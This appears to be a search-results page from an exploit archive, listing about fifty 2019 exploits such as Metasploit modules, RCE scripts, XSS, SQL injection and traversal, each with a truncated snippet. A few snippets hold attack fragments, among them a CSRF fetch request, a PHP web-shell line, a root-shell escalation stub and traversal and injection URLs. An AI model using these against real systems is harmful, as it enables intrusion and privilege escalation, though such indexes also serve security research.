47884 matches found
Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Serv-U FTP Server prepareinstallation Privilege Escalation', 'Description' = %q This module attempts to gain root privileges on systems running...
Symantec DLP 15.5 MP1 - Cross-Site Scripting
Exploit Title: Persistent XSS on Symantec DLP = 15.5 MP1 Date: 2019-06-21 Exploit Author: Chapman Schleiss Vendor Homepage: https://www.symantec.com/ Software Link: https://support.symantec.com/us/en/mysymantec.html Version: = 15.5 MP1 CVE : 2019-9701 Advisory-URL:...
Centreon 19.04 - Remote Code Execution
!/usr/bin/python ''' Exploit Title: Centreon v19.04 authenticated Remote Code Execution Date: 28/06/2019 Exploit Author: Askar @mohammadaskar2 CVE : CVE-2019-13024 Vendor Homepage: https://www.centreon.com/ Software link: https://download.centreon.com Version: v19.04 Tested on: CentOS 7.6 / PHP...
Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Mac OS X TimeMachine tmdiagnose Command Injection Privilege Escalation', 'Description' = %q This module exploits a command injection in TimeMachi...
FaceSentry Access Control System 6.4.8 - Remote SSH Root
!/usr/bin/env python -- coding: utf-8 -- FaceSentry Access Control System 6.4.8 Remote SSH Root Access Exploit Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 568 Algorithm A14 Firmware 5.7.0 build 539 Algorith...
FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery
FaceSentry Access Control System 6.4.8 Cross-Site Request Forgery Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 568 Algorithm A14 Firmware 5.7.0 build 539 Algorithm A14 Summary: FaceSentry 5AN is a...
CyberPanel 1.8.4 - Cross-Site Request Forgery
Title: CyberPanel Administrator Account Takeover fetch'https://SERVERIP:8090/users/saveModifications', method: 'POST', credentials: 'include', headers: 'Content-Type': 'text/plain', body:...
ZoneMinder 1.32.3 - Cross-Site Scripting
Exploit Title: ZoneMinder 1.32.3 - Stored Cross Site Scripting filters Google Dork: None Date: 6/29/2019 Exploit Author: Joey Lane Vendor Homepage: https://zoneminder.com Software Link: https://github.com/ZoneMinder/zoneminder/releases Version: 1.32.3 Tested on: Ubuntu 16.04 CVE : Pending...
PowerPanel Business Edition - Cross-Site Scripting
Exploit Title: PowerPanel Business Edition - Stored Cross Site Scripting SNMP trap receivers Google Dork: None Date: 6/29/2019 Exploit Author: Joey Lane Vendor Homepage: https://www.cyberpowersystems.com Version: 3.4.0 Tested on: Ubuntu 16.04 CVE : Pending CyberPower PowerPanel Business Edition...
WorkSuite PRM 2.4 - 'password' SQL Injection
=========================================================================================== Exploit Title: WorkSuite PRM 2.4 - 'password' SQL Inj. Dork: N/A Date: 01-05-2019 Exploit Author: Mehmet EMİROĞLU Vendor Homepage: https://codecanyon.net/item/worksuite-project-management-system/20052522...
FaceSentry Access Control System 6.4.8 - Remote Command Injection
FaceSentry Access Control System 6.4.8 Remote Command Injection Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 568 Algorithm A14 Firmware 5.7.0 build 539 Algorithm A14 Summary: FaceSentry 5AN is a revolutionar...
Linux Mint 18.3-19.1 - 'yelp' Command Injection (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Exploit from github repro: https://github.com/b1ack0wl/linuxmintpoc class MetasploitModule "Linux Mint 'yelp' URI handler command injection vulnerability", 'Description'...
FaceSentry Access Control System 6.4.8 - Remote Root Exploit
!/usr/bin/env python -- coding: utf-8 -- FaceSentry Access Control System 6.4.8 Remote Root Exploit Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 568 Algorithm A14 Firmware 5.7.0 build 539 Algorithm A14...
CiuisCRM 1.6 - 'eventType' SQL Injection
=========================================================================================== Exploit Title: CiuisCRM 1.6 - 'eventType' SQL Inj. Dork: N/A Date: 27-05-2019 Exploit Author: Mehmet EMİROĞLU Vendor Homepage: https://codecanyon.net/item/ciuis-crm/20473489 Software Link:...
Sahi pro 8.x - Directory Traversal
Exploit Title: Sahi pro 8.x Directory traversal Date: 2019-06-25 Exploit Author: Operat0r Vendor Homepage: https://sahipro.com/ Software Link: https://sahipro.com/downloads-archive/ Version: 8.0 Tested on: Linux Ubuntu / Windows 7 CVE: CVE-2019-13063 An issue was discovered in Sahi pro...
SAP Crystal Reports - Information Disclosure
Exploit Title: Sensitive Information Disclosure in SAP Crystal Reports Date: 2019-04-10 Exploit Author: Mohamed M.Fouad - From SecureMisr Company Vendor Homepage: https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=517899114 Version: SAP Crystal Reports for Visual Studio, Version - 2010...
Varient 1.6.1 - SQL Injection
=========================================================================================== Exploit Title: Varient 1.6.1 SQL Inj. Dork: N/A Date: 29-06-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage: https://varient.codingest.com/ Software Link: https://varient.codingest.com/ Version: v1.6....
LibreNMS 1.46 - 'addhost' Remote Code Execution
!/usr/bin/python ''' Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution Date: 24/12/2018 Exploit Author: Askar @mohammadaskar2 CVE : CVE-2018-20434 Vendor Homepage: https://www.librenms.org/ Version: v1.46 Tested on: Ubuntu 18.04 / PHP 7.2.10 ''' import requests from urllib import...
Mozilla Spidermonkey - IonMonkey 'Array.prototype.pop' Type Confusion
The following program found through fuzzing and manually modified crashes Spidermonkey built from the current beta channel and Firefox 66.0.3 current stable: // Run with --no-threads for increased reliability const v4 = a: 0, a: 1, a: 2, a: 3, a: 4; function v7v8,v9 if v4.length == 0 v43 = a: 5; ...
Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Nagios XI Magpiedebug.php Root Remote Code Execution", 'Description' = %q This module exploits two vulnerabilities in Nagios XI 5.5.6:...
SuperDoctor5 - 'NRPE' Remote Code Execution
SuperMicro implemented a Remote Command Execution plugin in their implementation of NRPE in SuperDoctor 5, which is their monitoring utility for SuperMicro chassis. This is an intended feature but leaves the system open by default to unauthenticated remote command execution by abusing the...
WordPress Plugin iLive 1.0.4 - Cross-Site Scripting
Exploit Title: iLive - Intelligent WordPress Live Chat Support Plugin v1.0.4 Stored XSS Injection Google Dork: - Date: 2019/06/25 Exploit Author: m0ze Vendor Homepage: http://www.ilive.wpapplab.com/ Software Link: https://codecanyon.net/item/ilive-wordpress-live-chat-support-plugin/20496563...
BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal
Exploit Title: Directory Traversal on BlogEngine.NET Date: 24 Jun 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10717 1. Description ============== BlogEngine.NET is vulnerable to a directory traversal. The page...
AZADMIN CMS 1.0 - SQL Injection
Sql Injection on AZADMIN CMS of HIDEA v1.0 + Date: 24/06/2019 + CWE Number : CWE-89 + Risk: High + Author: Felipe Andrian Peixoto + Vendor Homepage: https://www.hidea.com/ + Contact: [email protected] + Tested on: Windows 7 and Linux + Vulnerable Files: newsdet.php + Dork :...
WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting
Exploit Title: Live Chat Unlimited v2.8.3 Stored XSS Injection Google Dork: inurl:"wp-content/plugins/screets-lcx" Date: 2019/06/25 Exploit Author: m0ze Vendor Homepage: https://screets.com/ Software Link: https://codecanyon.net/item/wordpress-live-chat-plugin/3952877 Version: 2.8.3 Tested on:...
SAPIDO RB-1732 - Remote Command Execution
Exploit Title: SAPIDO RB-1732 command line execution Date: 2019-6-24 Exploit Author: k1nm3n.aotoi Vendor Homepage: http://www.sapido.com.tw/ Software Link: http://www.sapido.com.tw/CH/data/Download/firmware/rb1732/tc/RB-1732TCv2.0.43.bin Version: RB-1732 V2.0.43 Tested on: linux import requests...
Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution
Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF Date: 2019-06-19 Exploit Author: @XORcat Vendor Homepage: https://fortinet.com/ Software Link: Customer Account Required Version: v1.2.0.0 Tested on: Linux CVE : TBA !-- FCM-MB40 CSRF to RCE as root, by Aaron Blair @xorcat Full...
SeedDMS versions < 5.1.11 - Remote Command Execution
Exploit Title: Remote Command Execution through Unvalidated File Upload in SeedDMS versions "; $cmd = $REQUEST'cmd'; system$cmd; echo ""; die; ? Step 3: Now after uploading the file check the document id corresponding to the document. Step 4: Now go to...
GrandNode 4.40 - Path Traversal / Arbitrary File Download
Exploit Title: GrandNode Path Traversal & Arbitrary File Download Unauthenticated Date: 06/23/3019 Exploit Author: Corey Robinson https://twitter.com/CRobSec Vendor Homepage: https://grandnode.com/ Software Link:...
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting
Exploit Title: Persistent Cross-Site Scripting or Stored XSS in out/out.UsrMgr.php in SeedDMS before 5.1.11 Google Dork: NA Date: 20-June-2019 Exploit Author: Nimit Jainhttps://secfolks.blogspot.com Vendor Homepage: https://www.seeddms.org Software Link:...
Microsoft Windows Font Cache Service - Insecure Sections Privilege Escalation
Windows: Windows Font Cache Service Insecure Sections EoP Platform: Windows 10 1809 not tested earlier Class: Elevation of Privilege Security Boundary per Windows Security Service Criteria: User boundary Summary: The Windows Font Cache Service exposes section objects insecurely to low privileged...
SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting
Exploit Title: Persistent Cross-Site Scripting or Stored XSS in out/out.GroupMgr.php in SeedDMS before 5.1.11 Google Dork: NA Date: 17-June-2019 Exploit Author: Nimit Jainhttps://secfolks.blogspot.com Vendor Homepage: https://www.seeddms.org Software Link:...
GSearch 1.0.1.0 - Denial of Service (PoC)
Exploit Title: GSearch v1.0.1.0 - Denial of Service PoC Date: 6/23/2019 Author: 0xB9 Twitter: @0xB9Sec Contact: 0xB9atpm.me Software Link: https://www.microsoft.com/store/productId/9NDTMZKLC693 Version: 1.0.1.0 Tested on: Windows 10 Proof of Concept: Run the python script, it will create a new fi...
dotProject 2.1.9 - SQL Injection
Exploit Title: dotProject 2.1.9 - Multiple Sql Injection Poc Exploit Author: Metin Yunus Kandemir kandemir Vendor Homepage: https://dotproject.net Software Link: https://github.com/dotproject/dotProject/archive/v2.1.9.zip Version: 2.1.9 Category: Webapps Tested on: Xampp for Windows Software...
Microsoft Windows - 'CmpAddRemoveContainerToCLFSLog' Arbitrary File/Directory Creation
Windows: CmpAddRemoveContainerToCLFSLog Arbitrary File/Directory Creation EoP Platform: Windows 10 1809 not tested earlier Class: Elevation of Privilege Security Boundary per Windows Security Service Criteria: User boundary Summary: The kernel’s CmpAddRemoveContainerToCLFSLog function doesn’t...
EA Origin < 10.5.38 - Remote Code Execution
Exploit Title: EA Origin 10.5.38 Remote Code Execution Date: 05/22/2019 Exploit Author: Dominik Penner @zer0pwn Vendor Homepage: https://www.origin.com Software Link: https://www.origin.com/can/en-us/store/download Version: 10.5.38 and below Tested on: Windows 7, Windows 8, Windows 10 CVE :...
Linux - Use-After-Free via race Between modify_ldt() and #BR Exception
/ When a BR exception is raised because of an MPX bounds violation, Linux parses the faulting instruction and computes the linear address of its memory operand. If the userspace instruction is in 32-bit code, this involves looking up the correct segment descriptor and adding the segment offset to...
Cisco Prime Infrastructure Health Monitor - TarArchive Directory Traversal (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability', 'Description' = %q This module exploits a vulnerability...
BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection
Exploit Title: Out-of-band XML External Entity Injection on BlogEngine.NET Date: 19 June 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10718 1. Description ============== BlogEngine.NET is vulnerable to an Out-of-Band...
Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Cisco Prime Infrastructure Runrshell Privilege Escalation', 'Description' = %q This modules exploits a vulnerability in Cisco Prime...
WebERP 4.15 - SQL injection
Exploit Title: Blind SQL injection in WebERP. Date: June 10, 2019 Exploit Author: Semen Alexandrovich Lyhin https://www.linkedin.com/in/semenlyhin/ Vendor Homepage: http://www.weberp.org/ Version: 4.15 A malicious query can be sent in base64 encoding to unserialize function. It can be deserialize...
Tuneclone 2.20 - Local SEH Buffer Overflow
Exploit Title: TuneClone Local Seh Exploit Date: 19.06.2019 Vendor Homepage: http://www.tuneclone.com/ Software Link: http://www.tuneclone.com/tuneclonesetup.exe Exploit Author: Achilles Tested Version: 2.20 Tested on: Windows XP SP3 EN 1.- Run python code : TuneClone.py 2.- Open EVIL.txt and cop...
BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Execution
Exploit Title: Directory Traversal + RCE on BlogEngine.NET Date: 17 Jun 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10720 1. Description ============== BlogEngine.NET is vulnerable to a Directory Traversal through th...
BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Directory Traversal / Remote Code Execution
Exploit Title: Directory Traversal + RCE on BlogEngine.NET Date: 17 Jun 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10719 1. Description ============== BlogEngine.NET is vulnerable to a Directory Traversal on...
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)
/ CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation vulnerability found by: Guy Levin @vastart - twitter.com/vastart https://blog.vastart.dev to compile and run: gcc servu-pe-cve-2019-12181.c -o pe && ./pe / include include include int main char vulnargs = "" ; id; echo 'opening root shell' ;...
Sahi pro 8.x - Cross-Site Scripting
Exploit Title: Sahi pro alertdocument.cookie”.start; log“testing stored XSS injection”; $tc1.end; Step 2 : Execute the created script poc.sah using sahi GUI controller . Step 3 : navigate to the web logs console http://:/logs using the browser for the executed script. XSS is triggered...
Sahi pro 7.x/8.x - Directory Traversal
Exploit Title: Sahi pro :/s/dyn/Loghighlight?href=../../../../windows/win.ini&n=1selected...
Sahi pro 8.x - SQL Injection
Exploit Title: Sahi pro :/s/dyn/pro/DBReports?sql=SELECT DISTINCT memoryused AS ROWSTATUS, SCRIPTREPORTS.SCRIPTREPORTID,SCRIPTREPORTS.SCRIPTNAME,SUITEREPORTS. FROM SUITEREPORTS,SCRIPTREPORTS...
Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow
X41 D-Sec GmbH Security Advisory: X41-2019-002 Heap-based buffer overflow in Thunderbird ========================================= Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL:...
Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow
X41 D-Sec GmbH Security Advisory: X41-2019-001 Heap-based buffer overflow in Thunderbird ========================================= Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL:...